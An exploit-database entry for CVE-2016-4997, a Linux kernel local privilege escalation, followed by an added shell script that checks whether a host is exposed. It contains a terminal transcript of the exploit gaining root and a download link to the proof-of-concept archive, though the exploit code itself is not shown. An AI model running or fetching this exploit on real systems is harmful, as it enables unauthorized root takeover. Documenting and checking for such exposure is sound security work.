# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call
# Date: 2016.10.8
# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360
# Version: Linux kernel <= 4.6.2
# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic
# CVE: CVE-2016-4997
# Reference: http://www.openwall.com/lists/oss-security/2016/09/29/10
# Contact: tyrande000@gmail.com
#
# DESCRIPTION
# ===========
# The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,
# which allows local users to escalate privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with the ip6_tables module loaded.

zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls
compile.sh  enjoy  enjoy.c  pwn  pwn.c  version.h
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables
[sudo] password for zhang_q:
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn
pwn begin, let the bullets fly . . .
and wait for a minute . . .
pwn over, let's enjoy!
preparing payload . . .
trigger modified tty_release . . .
got root, enjoy :)
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE#
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl
   Static hostname: ubuntu
         Icon name: computer-vm
           Chassis: vm
        Machine ID: 355cdf4ce8a048288640c2aa933c018f
    Virtualization: vmware
  Operating System: Ubuntu 16.04.1 LTS
            Kernel: Linux 4.4.0-21-generic
      Architecture: x86-64
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE#

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40489.zip
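An exposure check for the two conditions the advisory states (kernel <= 4.6.2 and the ip6_tables module loaded), added here as an example and not part of the exploit author's code. The function names version_le, ip6_tables_loaded and check_exposure are my own, and the /proc/modules sample is constructed.

```shell
#!/bin/sh
# Exposure check for CVE-2016-4997 (added example, not the author's code).
# Advisory conditions: kernel release <= 4.6.2 and ip6_tables loaded.

# version_le A B: succeed if dotted version A <= B. Distro suffixes such as
# "-21-generic" are stripped first; missing components count as 0.
version_le() {
    a=$(printf '%s' "$1" | sed 's/^\([0-9][0-9.]*\).*/\1/')
    b=$(printf '%s' "$2" | sed 's/^\([0-9][0-9.]*\).*/\1/')
    old_ifs=$IFS; IFS=.
    set -- $a; a1=${1:-0}; a2=${2:-0}; a3=${3:-0}
    set -- $b; b1=${1:-0}; b2=${2:-0}; b3=${3:-0}
    IFS=$old_ifs
    [ "$a1" -lt "$b1" ] && return 0
    [ "$a1" -gt "$b1" ] && return 1
    [ "$a2" -lt "$b2" ] && return 0
    [ "$a2" -gt "$b2" ] && return 1
    [ "$a3" -le "$b3" ]
}

# ip6_tables_loaded FILE: succeed if FILE (in /proc/modules format) lists ip6_tables.
ip6_tables_loaded() {
    grep -q '^ip6_tables ' "$1"
}

# check_exposure KERNEL_RELEASE MODULES_FILE: print a verdict and return 0 when
# both advisory conditions hold, 1 otherwise.
check_exposure() {
    if version_le "$1" 4.6.2 && ip6_tables_loaded "$2"; then
        echo "EXPOSED: kernel $1 <= 4.6.2 and ip6_tables is loaded"
        return 0
    fi
    echo "not exposed on the advisory's conditions: kernel $1"
    return 1
}

# Constructed /proc/modules sample for a host that ran "modprobe ip6_tables".
SAMPLE_MODULES='ip6_tables 28672 0 - Live 0x0000000000000000
x_tables 36864 1 ip6_tables, Live 0x0000000000000000'

demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_MODULES" > "$tmp"
    check_exposure 4.4.0-21-generic "$tmp" || :   # the kernel the advisory was tested on
    check_exposure 4.8.0-26-generic "$tmp" || :   # a release above the stated window
    rm -f "$tmp"
}
demo
```

Against a live host call check_exposure "$(uname -r)" /proc/modules; a version match alone cannot distinguish a distribution kernel with a backported fix from an unpatched one, so confirm the result against the distribution's security tracker.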